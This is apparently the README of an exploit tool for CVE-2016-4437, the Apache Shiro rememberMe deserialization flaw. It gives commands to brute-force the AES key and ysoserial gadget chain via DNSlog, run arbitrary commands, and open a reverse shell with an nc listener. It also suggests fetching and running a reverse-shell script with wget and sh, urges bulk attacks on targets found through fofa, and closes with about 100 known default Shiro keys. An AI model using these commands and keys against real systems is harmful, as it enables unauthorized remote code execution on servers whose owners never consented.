
CVE-2016-4437-Shiro反序列化爆破模块和key,命令执行,反弹shell的脚本
CVE-2016-4437 Shiro<=1.2.4 deserialization, brute-force module and key, code execution, reverse shell tool
Because Shiro deserializes the rememberMe field in the cookie, if you know Shiro's encoding method, you can encode a malicious command using its encoding method and place it in the HTTP header's cookie. When Shiro deserializes the submitted cookie's rememberMe field, the injected command is executed, resulting in command execution.
Shiro uses CookieRememberMeManager by default, and its cookie processing flow is:
Get the rememberMe cookie value --> Base64 decode --> AES decrypt --> Deserialize
Works on both linux/win10
Works on both python2/python3
Since the module directory contains ysoserial.jar, the project is a bit large. Please bear with us.
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
Needs to be combined with http://dnslog.cn/
python3 shiro_crack.py http://www.baidu.com/login.do 1695jb.dnslog.cn
After success, check the records – record format is {{key}}.{{module}}.dnslogurl
U3ByaW5nQmxhZGUAAAAAAA.CommonsBeanutils1.x9zm4v.dnslog.cn
This shows the successful key is U3ByaW5nQmxhZGUAAAAAAA==, and the module is CommonsBeanutils1.
Because the key may contain ==/+ and other characters, this project does a bit of escaping. You need to manually compare with the keys in Appendix 1.
Pick a target from fofa and have fun.

Actually, there are many tools online that brute-force modules and keys, but they usually only tell you if it worked, not which key and module were used, because for blind RCE, the response code is always 200 regardless of success or failure. This project combines brute-force modules and keys with DNSlog to indirectly obtain the successful key and module. The principle is the essence of DNSlog: when a DNS is resolved, it leaves a log. By reading the resolution logs of multi-level domain names, we can obtain the request information.
Can be combined with http://dnslog.cn/
python3 shiro_rce.py http://www.baidu.com/login.do "ping rcetest.x9zm4v.dnslog.cn"
Check DNSlog for ping rcetest.x9zm4v.dnslog.cn. For differentiation, it is recommended to use a subdomain one level lower.
python popen = subprocess.Popen(['java', '-jar', '../module/ysoserial.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
Change CommonsBeanutils1 to the module obtained from brute-force.key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

nc -lvnp 7777
python3 shiro_exp.py -u {{target machine}} -lh {{IP for reverse shell}} -lp {{port for reverse shell}}
For safety, test on localhost. The principle is to bundle JRMPListener and payload together. Actually, you could skip JRMPListener in theory.

A small thought:
Since outbound traffic is possible, why not directly use shiro_rce with bash reverse shell?
I tried a few times and failed. I think Shiro has some filtering, but I noticed you can first use wget to download a reverse shell .sh script, then execute it with sh.
Reference: My little research on reverse shell without jrmplistener
A simple test based on request/response headers – put Shiro-enabled sites into shiro.txt.
It is recommended to first obtain Shiro-enabled sites from fuzz-shiro into shiro.txt, then brute-force in bulk.
DNSlog records will be:
{{key}}.{{module}}.{{url}}.dnsurl
Works well in tests.
Run the following commands:
pip uninstall crypto pycryptodome
pip install pycryptodome
Then go to Python installation directory \Lib\site-packages, and rename the crypto folder to Crypto.
kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
fCq+/xW488hMTCD+cmJ3aQ==
0AvVhmFLUs0KTA3Kprsdag==
1AvVhdsgUs0FSA3SDFAdag==
1QWLxg+NYmxraMoxAXu/Iw==
25BsmdYwjnfcWmnhAciDDg==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
3JvYhmBLUs0ETA5Kprsdag==
r0e3c16IdVkouZgk1TKVMg==
5aaC5qKm5oqA5pyvAAAAAA==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
cmVtZW1iZXJNZQAAAAAAAA==
7AvVhmFLUs0KTA3Kprsdag==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
a3dvbmcAAAAAAAAAAAAAAA==
aU1pcmFjbGVpTWlyYWNsZQ==
bWljcm9zAAAAAAAAAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
bXRvbnMAAAAAAAAAAAAAAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
wGiHplamyXlVB11UXWol8g==
U3ByaW5nQmxhZGUAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
L7RioUULEFhRyxM7a2R/Yg==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
OY//C4rhfwNxCQAQCrQQ1Q==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
ZWvohmPdUsAWT3=KpPqda
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==